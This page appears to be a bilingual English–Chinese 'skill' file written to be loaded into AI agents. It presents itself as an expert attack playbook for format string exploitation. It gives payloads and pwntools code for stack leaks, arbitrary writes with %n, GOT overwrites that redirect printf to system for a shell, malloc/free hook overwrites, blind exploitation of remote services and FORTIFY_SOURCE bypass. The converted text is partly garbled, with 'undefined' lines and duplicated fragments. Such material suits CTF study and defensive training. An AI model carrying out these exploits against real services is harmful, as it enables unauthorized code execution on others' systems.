format-string-exploitation

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: Format String Exploitation — Expert Attack Playbook

SKILL: Format String Exploitation — 高级攻击手册

AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.

AI加载说明：高级格式化字符串技术，涵盖栈读取、%n任意写入、GOT覆写、__malloc_hook覆写、指针链利用、盲格式化字符串攻击、FORTIFY_SOURCE绕过、64位空字节处理，以及pwntools自动化实现。内容提炼自ctf-wiki格式化字符串章节、CTF常见模式及真实场景。基础模型通常会错误计算位置参数偏移量，或者遗漏格式字符串后的64位地址放置规则。

0. RELATED ROUTING

0. 相关关联技能

stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
arbitrary-write-to-rce — convert format string write primitive to code execution targets
heap-exploitation — heap address leak via format string for heap exploitation

stack-overflow-and-rop — 结合格式化字符串泄露与栈溢出实现完整利用
binary-protection-bypass — 格式化字符串是泄露canary/PIE/ASLR的主要方法
arbitrary-write-to-rce — 将格式化字符串写入原语转换为代码执行能力
heap-exploitation — 通过格式化字符串泄露堆地址用于堆漏洞利用

1. VULNERABILITY IDENTIFICATION

1. 漏洞识别

Vulnerable Pattern

漏洞模式

printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

Quick Test

快速测试

Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset

Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset

2. READING MEMORY

2. 内存读取

Stack Leak (%p)

栈泄露 (%p)

Format	Action	Use
`%p`	Print next stack value as pointer	Sequential stack dump
`%N$p`	Print N-th parameter as pointer	Direct positional access
`%N$lx`	Same as %p but explicit hex (64-bit)	Portable
`%N$s`	Dereference N-th parameter as string pointer	Read memory at pointer value

格式符	作用	用途
`%p`	将下一个栈值作为指针打印	连续栈转储
`%N$p`	打印第N个参数作为指针	直接位置访问
`%N$lx`	与%p功能相同，但显式输出64位十六进制值	可移植
`%N$s`	将第N个参数作为字符串指针解引用	读取指针指向的内存内容

Finding Your Input Offset

定位输入偏移

python

undefined

python

undefined

Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...

↑ offset = 6 (example)

Or automated:

for i in range(1, 30): io.sendline(f'AAAA%{i}$p') if '0x41414141' in io.recvline(): print(f'Offset = {i}') break

undefined

for i in range(1, 30): io.sendline(f'AAAA%{i}$p') if '0x41414141' in io.recvline(): print(f'Offset = {i}') break

undefined

Leaking Specific Values

泄露特定值

Target	Method	Stack Position
Canary	`%N$p` where N = canary offset from format string	Typically at offset buf_size/8 + few
Saved RBP	`%N$p` (just above return address)	Leaks stack address → stack base
Return address	`%N$p`	Leaks .text address (PIE base = leak & ~0xfff - offset)
Libc address	`%N$p` where N points to `__libc_start_main+XX` return on stack	libc base = leak - offset

目标	方法	栈位置
Canary	`%N$p` ，N为格式字符串对应的canary偏移	通常位于buf_size/8 + 少量偏移处
Saved RBP	`%N$p` （位于返回地址正上方）	泄露栈地址 → 栈基址
Return address	`%N$p`	泄露.text段地址（PIE基址 = 泄露值 & ~0xfff - 偏移）
Libc地址	`%N$p` ，N指向栈上的 `__libc_start_main+XX` 返回地址	libc基址 = 泄露值 - 偏移

Reading Arbitrary Address (%s)

读取任意地址 (%s)

undefined

undefined

32-bit: place address at start of format string

payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack

64-bit: address contains null bytes → place AFTER format specifiers

payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is

---

payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is

---

3. WRITING MEMORY (%n)

3. 内存写入 (%n)

Write Specifiers

写入说明符

Specifier	Bytes Written	Width
`%n`	4 bytes (int)	Characters printed so far
`%hn`	2 bytes (short)	Characters printed so far (mod 0x10000)
`%hhn`	1 byte (char)	Characters printed so far (mod 0x100)
`%ln`	8 bytes (long)	Characters printed so far

说明符	写入字节数	宽度
`%n`	4 bytes (int)	到目前为止打印的字符数
`%hn`	2 bytes (short)	到目前为止打印的字符数（mod 0x10000）
`%hhn`	1 byte (char)	到目前为止打印的字符数（mod 0x100）
`%ln`	8 bytes (long)	到目前为止打印的字符数

Arbitrary Write Technique

任意写入技术

Goal: Write value

to address

32-bit (address on stack directly):

python

undefined

目标：将值

写入地址

。

32位（地址直接放在栈上）：

python

undefined

Write 2 bytes at a time using %hn

Place target addresses in format string (they'll be on stack)

payload = p32(target_addr) # for low 2 bytes payload += p32(target_addr + 2) # for high 2 bytes

Calculate padding for each %hn write

low = value & 0xffff high = (value >> 16) & 0xffff payload += f'%{low - 8}c%{offset}$hn'.encode() payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()


**64-bit** (address AFTER format string):
```python

low = value & 0xffff high = (value >> 16) & 0xffff payload += f'%{low - 8}c%{offset}$hn'.encode() payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()


**64位**（地址放在格式字符串之后）：
```python

Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string

Solution: place addresses AFTER the format specifiers

Step 1: format string portion (no null bytes)

fmt = b'%Xc%N$hn%Yc%M$hn'

Step 2: pad to 8-byte alignment

fmt = fmt.ljust(align, b'A')

Step 3: append target addresses

fmt += p64(target_addr) fmt += p64(target_addr + 2)

undefined

fmt += p64(target_addr) fmt += p64(target_addr + 2)

undefined

Byte-by-Byte Write with %hhn

使用%hhn逐字节写入

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):

python

writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val

每次写入1字节保证精度（64位下完整48位地址需要6次写入）：

python

writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val

pwntools handles the math:

from pwn import fmtstr_payload payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

---

from pwn import fmtstr_payload payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

---

4. PWNTOOLS fmtstr_payload()

4. PWNTOLS fmtstr_payload()

python

from pwn import *

python

from pwn import *

Overwrite GOT entry with target address

payload = fmtstr_payload( offset, # stack offset where input appears {elf.got['printf']: libc.symbols['system']}, # {addr: value} numbwritten=0, # bytes already output before our input write_size='short' # 'byte', 'short', or 'int' )

For 64-bit with addresses after format string:

fmtstr_payload handles this automatically

undefined

undefined

FmtStr Class (Interactive Exploitation)

FmtStr类（交互式利用）

python

from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)

python

from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)

fmt.offset is auto-detected

fmt.write(elf.got['printf'], libc.symbols['system']) fmt.execute_writes()

---

fmt.write(elf.got['printf'], libc.symbols['system']) fmt.execute_writes()

---

5. GOT OVERWRITE VIA FORMAT STRING

5. 通过格式化字符串覆写GOT

Common Targets

常见目标

Overwrite	With	Trigger
`printf@GOT`	`system`	Next `printf(user_input)` → `system(user_input)` , send `/bin/sh`
`strlen@GOT`	`system`	If `strlen(user_input)` called
`puts@GOT`	`system`	If `puts(user_input)` called
`atoi@GOT`	`system`	If `atoi(user_input)` called (send `sh` as "number")
`__stack_chk_fail@GOT`	Controlled addr	Bypass canary check entirely
`exit@GOT`	`main`	Create infinite loop for multi-shot exploit

覆写目标	替换为	触发方式
`printf@GOT`	`system`	下一次调用 `printf(user_input)` → 执行 `system(user_input)` ，发送 `/bin/sh` 即可getshell
`strlen@GOT`	`system`	当程序调用 `strlen(user_input)` 时触发
`puts@GOT`	`system`	当程序调用 `puts(user_input)` 时触发
`atoi@GOT`	`system`	当程序调用 `atoi(user_input)` 时触发（发送 `sh` 作为"数字"即可）
`__stack_chk_fail@GOT`	可控地址	完全绕过canary检查
`exit@GOT`	`main`	创建无限循环实现多轮利用

Hook Targets (glibc < 2.34)

Hook目标（glibc < 2.34）

Target	One-gadget	Trigger
`__malloc_hook`	one_gadget addr	Any `printf` with large format → internal `malloc`
`__free_hook`	`system`	Trigger `free("/bin/sh")`

目标	替换为	触发方式
`__malloc_hook`	one_gadget地址	任意使用大格式的 `printf` 调用会触发内部 `malloc`
`__free_hook`	`system`	触发 `free("/bin/sh")` 即可

6. STACK POINTER CHAIN EXPLOITATION

6. 栈指针链利用

When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.

当格式化字符串不直接存储在栈上时（例如存储在栈指针引用的堆缓冲区中），使用栈上的指针链实现任意写入。

Two-Stage Write

两阶段写入

Stack:
  [offset A] → ptr_X (stack address pointing to another stack address)
  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr

This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

Stack:
  [offset A] → ptr_X (stack address pointing to another stack address)
  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr

该方法需要在栈上找到现有指针链（例如保存的帧指针形成的链：rbp → prev_rbp → prev_prev_rbp）。

Finding Pointer Chains

查找指针链

python

undefined

python

undefined

Leak stack with %p, look for:

1. Stack address A at offset N that points to another stack address B

2. Stack address B at offset M

Modify value at A (using %N$hn) to change where B points

Then write through B (using %M$hn) to target

---

---

7. BLIND FORMAT STRING

7. 盲打格式化字符串

Remote service, no binary, no source — exploit format string blind.

远程服务，无二进制文件，无源码——盲打利用格式化字符串漏洞。

Methodology

方法流程

Step	Action	Purpose
1	Send `%p` × 50	Dump stack, identify address patterns
2	Identify offsets	Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs
3	Find input offset	Send `AAAA%N$p` for N=1..50, find 0x41414141
4	Identify binary base	Code addresses reveal PIE base (or fixed base if no PIE)
5	Leak GOT entries	If binary base known, read GOT via `%N$s` with GOT address
6	Calculate libc base	GOT value - libc symbol offset
7	Overwrite GOT	`%n` to rewrite GOT entry with system address

步骤	操作	目的
1	发送50个 `%p`	转储栈内容，识别地址模式
2	识别偏移	找出libc地址（0x7f开头）、栈地址（0x7ff开头）、代码地址
3	定位输入偏移	遍历N=1..50发送 `AAAA%N$p` ，找到返回0x41414141的偏移
4	确定二进制基址	代码地址可计算出PIE基址（无PIE则为固定基址）
5	泄露GOT条目	已知二进制基址后，通过带GOT地址的 `%N$s` 读取GOT内容
6	计算libc基址	GOT值 - libc符号偏移
7	覆写GOT	使用 `%n` 将GOT条目重写为system地址

8. FORTIFY_SOURCE BYPASS

8. FORTIFY_SOURCE绕过

FORTIFY_SOURCE

(gcc

-D_FORTIFY_SOURCE=2

) replaces

printf

with

__printf_chk

which forbids
%N$n
(positional writes).

FORTIFY_SOURCE

（gcc编译参数

-D_FORTIFY_SOURCE=2

）会将

printf

替换为

__printf_chk

，禁止使用
%N$n
（位置写入）。

Bypass Techniques

绕过技术

Method	Detail
Use `%hn` sequentially (no positional)	Print exact byte count, `%hn` , adjust, `%hn` — fragile but works
Stack-based exploit	If format string is on stack, use non-positional `%n` with stack position control
Heap overflow instead	FORTIFY doesn't protect heap — combine with heap bug
Return-to-printf	ROP to call unfortified `printf` (if available in binary or libc)

方法	细节
顺序使用 `%hn` （无位置参数）	打印精确字节数后调用 `%hn` ，调整后再调用 `%hn` — 稳定性差但有效
基于栈的利用	如果格式字符串在栈上，结合栈位置控制使用非位置参数的 `%n`
改用堆溢出	FORTIFY不保护堆 — 结合堆漏洞利用
Return-to-printf	ROP调用未加固的 `printf` （如果二进制或libc中存在）

9. 64-BIT CONSIDERATIONS

9. 64位注意事项

Challenge	Solution
Addresses contain `\x00` (null byte terminates format string)	Place addresses AFTER format specifiers, pad to alignment
Address width: 6 significant bytes	Write 3 × `%hn` (2 bytes each) or 6 × `%hhn`
Larger stack offset range	Input may be at offset 6+ due to 6 register args saved
48-bit address space	Only bottom 48 bits of 64-bit used

挑战	解决方案
地址包含 `\x00` （空字节会截断格式字符串）	将地址放在格式说明符之后，填充到对齐长度
地址宽度：6个有效字节	写入3次 `%hn` （每次2字节）或6次 `%hhn`
栈偏移范围更大	由于6个寄存器参数入栈，输入偏移通常从6开始
48位地址空间	64位地址仅使用低48位

Layout Template (64-bit)

布局模板（64位）

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

10. DECISION TREE

10. 决策树

Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → positional %n blocked
│   │   ├── Sequential %n possible? → non-positional write
│   │   └── Combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes

确认存在格式化字符串漏洞（printf(user_input)）
├── 是否开启FORTIFY_SOURCE? (__printf_chk)
│   ├── 是 → 位置参数%n被禁用
│   │   ├── 可使用顺序%n? → 非位置参数写入
│   │   └── 结合其他原语（堆漏洞、ROP）
│   └── 否 → 可使用完整位置参数%n
├── 首先需要获取什么?
│   ├── 泄露canary → 用canary栈偏移对应的%N$p
│   ├── 泄露PIE基址 → 返回地址偏移对应的%N$p → 基址 = 泄露值 - 已知偏移
│   ├── 泄露libc基址 → 栈上__libc_start_main返回地址对应的%N$p
│   ├── 泄露堆基址 → 栈上堆指针对应的%N$p
│   └── 泄露特定地址 → 栈上放置目标地址，使用%N$s
├── 架构?
│   ├── 32位 → 地址放在格式字符串开头
│   └── 64位 → 地址放在格式字符串之后（解决空字节问题）
├── 写入目标?
│   ├── 部分RELRO → GOT覆写（printf→system, atoi→system）
│   ├── 完全RELRO → __malloc_hook或__free_hook（glibc <2.34）
│   ├── 完全RELRO + glibc ≥ 2.34 → 目标_IO_FILE、exit_funcs、TLS_dtor_list
│   └── 栈返回地址 → 直接覆写（如果已绕过ASLR）
├── 单次利用还是多次利用?
│   ├── 循环（多次利用） → 增量覆写GOT条目，使用指针链
│   └── 单次利用 → fmtstr_payload()一次性构造所有写入的payload
└── 输入不在栈上?（堆缓冲区）
    └── 使用栈指针链实现间接写入